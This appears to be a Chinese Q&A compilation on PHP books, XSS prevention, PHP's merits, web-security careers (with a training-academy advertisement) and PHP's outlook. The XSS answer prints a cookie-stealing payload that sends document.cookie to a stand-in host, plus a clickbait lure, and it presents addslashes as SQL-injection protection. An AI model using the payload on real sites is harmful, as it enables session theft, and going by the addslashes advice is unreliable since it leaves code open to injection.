php安全性怎么样

1、php安全性怎么样，学php什么买那本书比较好？

四川优就业的小编为你推荐书籍：

入门篇：《PHP和MySQL Web开发(第四版)》进阶篇：《深入PHP 面向对象、模式与实践》钻研篇：《代码大全》《重构 改善既有代码的设计》《程序员修炼之道 从小工到专家》《人月神话》，其他：数据结构与算法、设计模式、安全、最佳实践。

2、PHP如何防止XSS攻击？

XSS攻击通常指的是通过利用网页开发时留下的漏洞，通过巧妙的方法注入恶意指令代码到网页，使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript，但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后，攻击者可能得到包括但不限于更高的权限（如执行一些操作）、私密网页内容、会话和cookie等各种内容。

HTML是一种超文本标记语言，通过将一些字符特殊地对待来区别文本和标记，例如，小于符号（<）被看作是HTML标签的开始，<title>与</title>之间的字符是页面的标题等等。当动态页面中插入的内容含有这些特殊字符（如<）时，用户浏览器会将其误认为是插入了HTML标签，当这些HTML标签引入了一段JavaScript脚本时，这些脚本程序就将会在用户浏览器中执行。所以，当这些特殊字符不能被动态页面检查或检查出现失误时，就将会产生XSS漏洞。

当然我会将标题设计的非常吸引人点击，比如 “陈冠希艳照又有流出2012版(20P无码)” ，这样如果我将里面的alert换成恶意代码，比如：

location.href='http://www.xss.com?cookie='+document.cookie’；或者<a href='http://www.xss.com?cookie='+document.cookie>。用户的cookie我也拿到了，如果服务端session没有设置过期的话，我以后甚至拿这个cookie而不需用户名密码，就可以以这个用户的身份登录成功了。

预防XSS攻击

从根本上说，解决办法是消除网站的XSS漏洞，这就需要网站开发者运用转义安全字符等手段，始终把安全放在心上。

简单点，就是过滤从表单提交来的数据，使用php过滤函数就可以达到很好的目的。

htmlspecialchars() 函数

代码实例：

<?php

if (isset($_POST['name'])){

$str = trim($_POST['name']); //清理空格

$str = strip_tags($str); //过滤html标签

$str = htmlspecialchars($str); //将字符内容转化为html实体

$str = addslashes($str); //防止SQL注入

echo $str;

}

?>

<form method="post" action="">

<input name="name" type="text">

<input type="submit" value="提交" >

</form>

具体操作无法一一写出，需要你边实践边摸索

3、PHP语言的有哪些优势和特点？

PHP全称英文超级文本预处理语言(HypertextPreprocessor)，它是在服务器端执行的脚本语言，与C语言类似，是常用的网站编程语言。PHP语言主要有以下特点：

1、开源性和免费性。由于PHP的解释器的源代码是公开的，所以安全系数较高的网站可以自己更改PHP的解释程序。另外，PHP运行环境的使用也是免费的。

2、跨平台性强。由于PHP的解释器是开源的，所以能够在所有的操作系统平台上非常稳定地运行，这使它成为常用的服务器语言。

3、快捷性。PHP是一种非常容易学习和使用的一门语言，它的语法特点类似于C语言，但又没有C语言复杂的地址操作，而且又加入了面向对象的概念，再加上它具有简洁的语法规则，使得它操作编辑非常简单，实用性很强。

4、面向过程和面向对象并用。在PHP语言的使用中，可以分别使用面向过程和面向对象，而且可以将PHP面向过程和面向对象两者一起混用，这是其他很多编程语言是做不到的。

5、运行高效性。由于PHP运行在相应的平台解释器上，消耗系统资源比较少，运行的环境简单，所以效率就很高。

6、数据库连接的广泛性。PHP可以与很多主流的数据库建立起连接，如MySQL、ODBC、Oracle、AdabasD、S等，PHP是利用编译的不同函数与这些数据库建立起连接的，PHPLIB就是常用的为一般事务提供的基库。

4、web安全这个行业的前景怎么样？

任何一个事情都有两面性，互联网最初诞生的时候是安全的，但是伴随着黑客的出现，互联网变得越来越不安全。同样的两面性，黑客也有好有坏，好的黑客叫白帽子，坏的黑客叫黑帽子，也有介于二者中间的灰帽黑客。随着Web技术发展越来越成熟，而非Web服务（如Windows操作系统）越来越少的暴露在互联网上，现在互联网安全主要指的是Web安全。

既然要讲Web安全，首先介绍什么是安全，安全的本质是什么？引用《白帽子讲安全》里对安全的定义：安全问题的本质就是信任问题。举例来说，自行车的车锁，我们认为是安全的，因为我们认为自行车锁的制造商是不会背着我们留有钥匙，如果这个信任都没有的话，那么这个自行车就是不安全的。

废话说完了咱开始正题。

一、零基础，从哪点学起？

本人至今都不推荐纯零基础的小白开始直接看Web方向的书和资料，其难度仿佛你让一个三岁小孩去自己申请斯坦福大学商学院一样。

首先你要提前学习好Web安全需要用到的语言，先学会走在学会跑，这里就不多说了。

成功掌握语言后咱开始正式学习Web安全，咱用思维导图的方式展现各级别需要学习的内容（分的很细很全面），咱们以拿到中国信息安全认证中心（ISCCC）的WEB证书为目标，内容分为“初级+中级”“高级”两个部分（建议下载原图后放大查看），希望对你有所帮助。

内容看起来很多很庞大，其实是什么事细分后都是这样，仿佛你点个赞的动作需要手指、神经、大脑、肌肉等等组织内细胞一起工作后的结果（疯狂明示）。

二、就业前景怎么样

首先思考这个问题的前提是已经学会“初级+中级”所有内容，然后我们看看国内某知名招聘网站上对公司规模“10000人以上”对“WEB安全”岗位薪资默认排序（大部分招聘均初中级，高级几乎都是面议、跳槽、挖人）。可以说你就能拿到国家颁发的资质证书后，国内知名互联网公司随你选，世界互联网百强也也可尝试。

目前赛虎学院所了解的朋友or学生，零基础纯小白学完初级后薪资在6-9K，中级薪资是10-15K，中级三年以上的朋友们是20-40K之间。高级的话咱都是抱大腿！他们的薪资在平台网站上都是“面议”。

在和某大佬朋友们聚会酒后讨论起压力问题时听大佬说过“我年薪百万的压力不比他们年薪十万的小”。

看来WEB安全高级大佬的上升空间还有很多，年薪百万依旧有压力？加薪？升职？创业？我等平民是想象不到了。告辞！

三、学习的方法

第一种：完全自学型

能采用自学方法成材的人都是“狼人”，除了每天耗费大量的时间精力来看书、查资料、做实验、问大佬以外，还需要自己摸索着前进，最重要的是接近变态的自律能力和自我驱动能力！

因为非计算机专业的人，最后靠自学成为专业程序员的，往往是因为确实对这事儿感兴趣有热情。而且他们中不少人视野更宽、兴趣更广泛，因此更有可能取得较高成就。例如全球几乎都认识的四位大佬，他们都是自学成才。

Apple——Steve JobsFacebook——Mark Elliot ZuckerbergTwitter——Jack DorseyMicrosoft——Bill Gates

相信很多人都尝试过自学方法，效率低下和无法坚持下来是两大放弃的主要原因，其难度远远超出考研的难度。想想也是，如果随随便便自学成功的话，那网上的培训机构还有什么存在的意义。

第二种：花钱报班型

这种方法可以说是“走捷径”，因为授课的老师几乎不会讲考试以外的知识点，完全为了应对考试而上课的课程缺少灵魂。可以说带进门可以，发展什么样要看你以后的自学能力了，目前市场上很少有保证就业的课程班，有保证就业的班级也是为你推荐到某公司企业，试用期就看你的表现了（都是这样的，不过大多数都留下来签正式了）。

说道这里咱就要推荐一下咱家的课程了，虽说叫“Web安全工程师·训练营”但是咱是就业班，目前是第二次开课，第一批课程的学员们100%入职各大企业（启明星辰、360、瑞星等）！

而且咱赛虎学院的课程很直接，明确告诉你在赛虎学院你能学到什么，不是让你学完就自生自灭了！咱的目的是让学生们拿到中认的证书和国测的证书！不信各位看看下图~

有想要学习Web安全的同学们最怕的就是没保障、没学到实用知识、没官方认证的证书和资质，这些事在赛虎学院全部能得到解决！

5、PHP在2018已经过时了吗？

我把题主的问题拆分为两个来解答：1. 现在是移动互联网的天下，PHP没有发展前景。

在这里我要说明一下，“移动互联网”这个词范围太宽范，“编程语言”则是软件开发行业的词汇，我们就如软件开发行业来说，“移动互联应用”，就是我们目前所用的手机APP，常用开发语言Java(java se, android方向)、Swift、Kotlin、OC。但是这些语言所开发出来的软件只是相当于一个客户端（前端），这些客户端都需要后台服务来支撑。而目前的APP后端服务编程语言又分：Java、PHP、Python、Golang等等 ...

PHP作为一个发展十多年的老牌服务器脚本语言，已经在WEB领域占有极大的份额。同时随着互联网的发展，大量的免费学习资源在网络上泛滥，并且其活跃社区仍有一大部分开发者在维护自己的开源项目。

PHP在全球的市场占有率是非常高的，相信下面这句话大家也都见过：

全球5000万WEB网站60%以上都是PHP开发的，而且国内80%的网站也都使用了LNMP的架构。

就目前的PHP开源框架来看，PHP目前拥有Workerman、Swoole这种网络通信框架，已经不仅仅只是适用于普通web网站开发，已经在直播、通信行业具有一定的占有率。

2. 学了PHP有没有用？

任何编程语言学了都有用。

我不能说学了PHP或者学了Python等语言哪个有前途，哪个有用。因为编程语言都是相通的，学习了PHP之后你再学习Python也会非常快速，因为其都是脚本语言，具有很多共性，相反也是一样。

以上回答只代表本人的观点以及经验。对IT行业感兴趣的或者想通过自学进入软件开发行业的欢迎关注，可以提供学习上的帮助。如有不同意见或者需要补充的可以下方评论，多谢指正！

（ 评论+关注私信我“java”、“python”、“php”，可以免费分享学习资料哦~ ）